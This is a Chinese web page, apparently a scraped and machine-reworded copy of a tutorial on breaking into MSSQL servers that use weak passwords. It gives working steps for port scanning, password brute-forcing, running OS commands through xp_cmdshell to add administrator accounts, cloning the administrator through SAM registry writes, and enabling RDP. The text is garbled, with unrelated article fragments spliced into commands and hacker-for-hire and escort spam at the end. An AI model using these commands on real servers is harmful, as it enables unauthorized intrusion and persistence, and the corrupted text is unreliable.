网站黑客技术:针对MSSQL弱口令实战流程整理与问题记载

访客4年前黑客资讯879

1. 端口发现 


1.1. 常用东西引荐

常用端口扫描东西,其实许多这儿不做过多的阐明,自己还是以经典好用的nmap进行实践练习。

nmap 

nmap东西的下载,请直接去其官方网站下载即可。

ssport

ssport 是个简略快速的图形化端口扫描东西。

1.2. nmap端口扫描

我们现在进行整个网段的TCP 1433端口扫描,勘探下敞开了1433端口的服务器地址,详细端口扫描指令如下:

1 nmap -p1433 --open x.x.x.0/24

扫描成果截图如下:

通过以上nmap的扫描发现,本政策网段存在4台主机敞开了长途1433端口服务。

 

2. 弱口令爆炸


2.1. 常用东西引荐

x-scan

hscan

nmap

x-scan 与hscan两款东西(x-scan & hscan)都是自带字典的图形化常见运用的扫描检测东西,他们各自支撑扫描检测的运用类型十分丰富,详细的状况这儿也不做过多的赘述,我这儿仅以hscan和nmap作为实操东西别离进行演练。

2.2. Nmap 弱口令爆炸

Nmap 扫描器功用之强壮,这儿必定不需求我等小菜过多的阐明晰,我这儿只简略的说下Nmap强壮的扫描脚本的运用 *** 。其实运用也是十分便利的,只需我们找到相应的脚本,直接以文本编辑形式翻开脚本,就能够找到详细的运用 *** ,后面会详细演示给我们,详细进程如下。

2.2.1. 查找ms-sql暴力破击脚本

Nmap的一切相关扫描脚本都存放在Nmap设备目录下的“script”目录下,在我们进入“script”目录后,直接查找ms-sql关键字就能够找到一切与ms-sql相关的扫描脚本,这儿我们运用脚本“ms-sql-brute”这个ms-sql暴力爆炸模块,其实我们从它的姓名也能猜到本模块的功用。 

2.2.2. 查看ms-sql-brute脚本运用 ***

在查找到nmap脚本后,我们能够直接以文本编辑容许Everyone组成员工作%WINDIR%以及%PROGRAMFILES%目录下的任何可实行文件;的形式翻开脚本,我们看文本中有个一个单词“@usage”,其实便是运用 *** 了,在运用 *** 中现已给出了详细的运用事例,我们直接仿制出来,然后在CMD下直接进行修改后即可运用了。

2.2.3. 调用ms-sql-brute脚本进行扫描

竟然是进行ms-sql登录口令的暴力破解,天然便是要用到字典了,有关弱口令字典的内容需求我们自行去收集了,许多的一些扫描东西中都会字典部分弱口令字典,我们平常也能够收集整理起来,以备运用。

那么接下来,我们直接参看扫描脚本中的事例,直接修改了字典的称号和扫描政策即可下发扫描使命了。以下截图别离给出了“单个主机”和“主机列表”的扫描进程截图。

2.3. hscan 弱口令爆炸

2.3.1. 装备扫描模块

通过“菜单”-“参数”指定MSSQL 弱口令查看;

2.3.2. 装备扫描参

通过“菜单”-“参数”阅览指定前面发现地址列表。

2.3.3. 建议扫描使命

2.3.4. 扫描成果

3. MSSQL 侵略


至此,我们现已完成对 *** 中存在弱口令的ms-sql服务的安全扫描查看工作,接下来要进入到真实的侵略渗透压轴大戏了。

3.1. 数据库查询东西引荐

下面别离给我们贴出两个mssql查询剖析东西的下载链接,请我们关于东西的运用要稳重,千万不要不要用于不合法的攻击行为。 *** 安全行将发布了,请我们做个遵纪守法的小伙伴。

1) MSSQL 查询剖析器 

云盘下载:http://pan.baidu.com/s/1slK0tbf 暗码:0bdb

2) MSSQL 履行器 

下载地址:

http://xiaowang.blog.51cto.com/attachment/200902/1083_1233814542.rar

3) Nmap 脚本联接

关于nmap的运用,我们相同能够运用其供应的ms-sql-xp-cmdshell脚本直接进行提权操作。

3.2. 联接登录数据

我这儿演示,运用mssql查询剖析器,运用进程中发现比较稳定些,也引荐给我们。现在直接运用mssql剖析联接数据库。

3.3. 增加体系账号并提权

3.3.1. 之一步:运用xp_cmdshell增加一般账号test

增加账号:

1 xp_cmdshell ‘net user test 123 /add’

3.3.2. 第二步:运用xp_cmdshell进行test用户提权

提权句子:

1 xp_cmeshell ‘net localgroup administrators test /add’

3.3.3. 第三步:查询用户提权状况

用户查询:

1 xp_cmdshell ‘net user test’

3.4. 查询3389端口是否敞开

3.5. 坚持拜访

关于怎样坚持拜访,我们能够通过“破解体系超级办理员暗码”或“克隆体系办理员权限”都能够,这儿为了对前面学习的新技能进行回忆,我这儿运用xp_regread与xp_regwrite进行administrator账户进行权限克隆的实操演示。

3.5.1. 之一步:查询administrator账号的value值

1 xp_regread 'HKEY_LOCAL_MACHINE','SAMSAMDomainsAccountUsers00001F4','F'

3.5.2.第二步:将administrator账号的value值赋给guest

1 xp_regwrite 'HKEY_LOCAL_MACHINE','SAMSAMDomainsAccountUsers00001F5','F','reg_binary',0x......

3.5.3.第三步:启用guest账户并提权

Windows2000以上的体系环境,guest用户必须在“Remote Desk Users”以上权限的用户组中,才答应你长途登录体系,故需求将guest用户增加到超级用户办理组中。

我们直接运用xp_cmdshell存储进程进行guest一般账号的提权,详细指令如下。

注:前面共享的原理性文章中现已弥补阐明过,windows2000体系是无需进行这儿的第三步的操作。

4. 常见问题记载


终究关于个人在实践渗透中遇到的各种的问题进行下小结,并将解决问题的实操 *** 与状况记载如下,共享于我们。

4.1. 存储进程不能调用

4.1.1. 假设提示xp_cmdshell被删除了怎样办?

工作以下句子进行康复:

1 exec sp_addextendedproc 'xp_cmdshell', 'Xplog70.dll'

4.1.2.假设提示xp_cmdshell被停用户怎样 ***

工作以下句子进行康复:

1 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

4.2. 3389服务封闭了怎样办?

4.2.1. Windows 2003环境RDP服务敞开

履行以下指令查看句子,查看c:更目录是否有windows目录,假设有则阐明当时体系为windows 2003体系及以上体系。

1 exec master..xp_cmdshell 'dir c:'

随后我们再履行以下句子进3389端口服务的敞开。 

 

1 2 3 4 5 6 7 8 输入我们刚刚获取的mac地址,点击阅览

    c.2 gzip模块需求zlib库,下载地址:http://www.zlib.net/

exec master..xp_cmdshell 'echo Windows Registry Editor Version 5.00>>3389.reg' exec master..xp_cmdshell 'echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]>>3389.reg' exec master..xp_cmdshell 'echo "fDenyTSConnections"=dword:00000000>>3389.reg' exec master..xp_cmdshell 'echo [HKEY_LOCALa8096ddf8758a79fdf68753190c6216a_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp]>>3389.reg' exec master..xp_cmdshell 'echo "PortNumber"=dword:00000d3d>>3389.reg' exec master..xp_cmdshell 'echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp]>>3389.reg' exec master..xp_cmdshell 'echo "PortNumber"=dword:00000d3d>>3389.reg' exec master..xp_cmdshell 'regedit /s 3389.reg'

注:现已验证句子履行结束后,无需重启,即可直接长途登录。

4.2.2. windows 2000环境RDP服务敞开 

看看根目录下假设有WINNT目录,则一般是win2000,随后再履行下面的句子来敞开其3389服务。

 

1 2 3 4 exec master..xp_cmdshell 'dir c:' exec master..xp_cmdshell 'echo [Components] > c:winnt3389' exec master..xp_cmdshell 'echo TSEnable = . >> c:winnt3389' exec master..xp_c

HSTS战略避免了这种挟制的存在,它要求阅览器在本地将http协议强制转换为https,之后再与服务器通过https协议进行通讯。

mdshell ·'sysocmgr /i:c:winntinfsysoc.inf /u:c:winnt3389 /q'

注:window 2000体系需求重启后,装备才干收效。

4.3. 运用3389联接时,提示联接用户必须有长途联接的权限怎样
网站黑客技术:针对MSSQL弱口令实战流程整理与问题记载
办?

直接将检验用户增加到“administrators”用户组,履行句子如下: 

1 exec master..xp_cmdshell 'net localgroup administrators test /add'

4.4. 联接3389,提示联接用户已满怎样办?

能够直接在“工作”中履行以下指令来调用“长途桌面办理东西”: 

1 mstsc /admin

本文由 安全客 原创发布,如需转载请注明来历及本文地址。本文地址:http://bobao.360.cn/learning/detail/3932.html

网站黑客技术:针对MSSQL弱口令实战流程整理与问题记载

保存,从头回编译,相同运用jarsig
网站黑客技术
ner进行签名,将生成的设备包设备到Android机上,看看效果:然后写入文件代码如下:图4. 运用Rubeus及svc-backdoor账户的Kerberos AES秘钥获取该账户的TGT针对MSSQL弱口令实战流程梳理与问题记录

网站黑客技术工作了上述指令之后,你将会拿到政策PC的meterpreter会话,接下来…假设仍出现SSL errors,或运用程序自身因为等候联接而发生卡死现象,则运用程序服务器或许正在运用某种TLS链验证或SSL证书固定。绕过SSL证书固定的最简略 *** 是,设备易于运用的东西软件来帮我们结束这个进程。以下是我所运用的两款东西:JAR包更新

工作之后,代码会启用一个随机命名的实例,而这个实例替换恶意软件的Payload。腾讯御见挟制情报中心已发现有关病毒作者的条理,这位挖矿木马的控制者运用同一个ID在各类黑客论坛、开发者论坛生动时间长达十年以上。 static void Main(string[] args)DELETE网站黑客技术

4. OpenSSH 为什么在子进程中从头工作自身?exec{"/usr/bin/sshd"}"/usr/ *** in/sshd",@ARGV;5.点开单个源:

可视化宏记载器协助您轻松检验 web 表格和受暗码保护的区域下载地址:https://github.com/DesignativeDave/androrat

为了缓解这种状况,暗码学家引入了「拉伸」的概念:重复 Hash 多次,然后增加核算时间。

In file included from /home/muhe/linux_kernel/linux-2.6.32.1/arch/x86/include/a *** /vm86.h:130:0,针对MSSQL弱口令实战流程梳理与问题记录

网站黑客技术[2] 对政策函数进行 before、after 代码插桩,多用于操作(查看或批改
针对MSSQL弱口令实战流程梳理与问题记录
)api的入参以及返回值。2.2 自有数字证书的生成

0×01 安卓:5.1、persistence后渗透侵犯模块2GHz的处理器DB2 for Linux, UNIX and Windows(LUW)网站黑客技术

概略本次展览上最家长们抢眼球的便是机器人了,大部分智能产品瞄准了儿童商场,多家展商带来了为学前儿童规划的机器人宝宝,家长能够通过手机端实时监测孩子的状况,伙伴机器人宝宝还能陪孩子背古诗,学汉字。妈妈再也不用担忧我的学习。 针对MSSQL弱口令实战流程梳理与问题记录

其间,指令种类数指的是100个指令组成的指令块中出现过的指令种类;最多的n个指令则是指指令块中出现次数降序摆放的前n个;同理,最少的m个指令则是指指令块中出现次数降升序摆放的前m个。相同是User7的之一个指令块,提取特征向量为:

终究仍是希望智能硬件厂商能够更加注重安全,供应安全的智能日子。我们也会对工作尽自己的一份力, *** 更安全的物联网。

服务端运用 SharedKey 解密出 Ticket 之后,再从数据库中找到该 uid 对应的 SaltHash2 ,解密 Ticket ,得到 SaltHash1 ,运用 SaltHash1 从头核算 SaltHash2 看是否和数据库中的 SaltHash2 一起,然后验证暗码是否正确。

[1][2]黑客接单网

关于这种侵犯 *** 的更多信息能够参看这篇文章:Finding Passwords in SYSVOL & Exploiting Group Policy Preferences
本文标题:网站黑客技术:针对MSSQL弱口令实战流程整理与问题记载

相关文章

埃及出土100具距申公元今2500年的完整棺椁

  埃及14日宣布在开罗附近的塞加拉考古遗址出土了100具距今2500年的保存完好的棺椁,称“这是埃及2020年最大的一项考古发现”。   据悉,这些棺椁属于古埃及第26王朝时代。同时出土的还有一些...

中国疫苗助力世界抗疫阿部力史可 用实际行动践行“人类命

  媒体焦点 | 中国疫苗助力世界抗疫 用实际行动践行“人类命运共同体”理念   央视网消息:疫情之下,中国疫苗惠及多国。中国疫苗为何备受青睐?中国为促进疫苗公平分配,做出了哪些努力?   中国疫...

手机word怎么看字数

1、开启Microsoft word。2、挑选文本文档进入页面。3、点一下顶端的签字笔。4、然后点一下右边的下拉标志。5、挑选逐渐。6、点一下审查。7、挑选统计字数。8、在默认设置页面就可以见到有多少...

南京高端商务吧-【韦亦瑶】

“南京高端商务吧-【韦亦瑶】” 身高:181cm姓名:印儿茂4:有任何问题找经纪人沟通,经纪人负责处理和保证预约过程的质量。5005评论0希望能得到以下职业机会:图片摄影,电视节目制作,数字媒体艺术,...

MySQL中的默认数据库

MySQL中的默认数据库默认数据库分类:information_schemaperformance_schemamysqlsysinformation_schema保存了MySQL服务所有数据库的信息...

如何彻底删除酒店自己的开房入住记录

<-- --> 抽奖要是能中大奖可以说是惊喜连连了,而对于大多数没怎么中过奖的人来说,能中一次奖真的是特别的开心,那么中奖绝缘体中奖了发点什么好呢,友谊长存小编就来说说吧。 中奖绝缘体...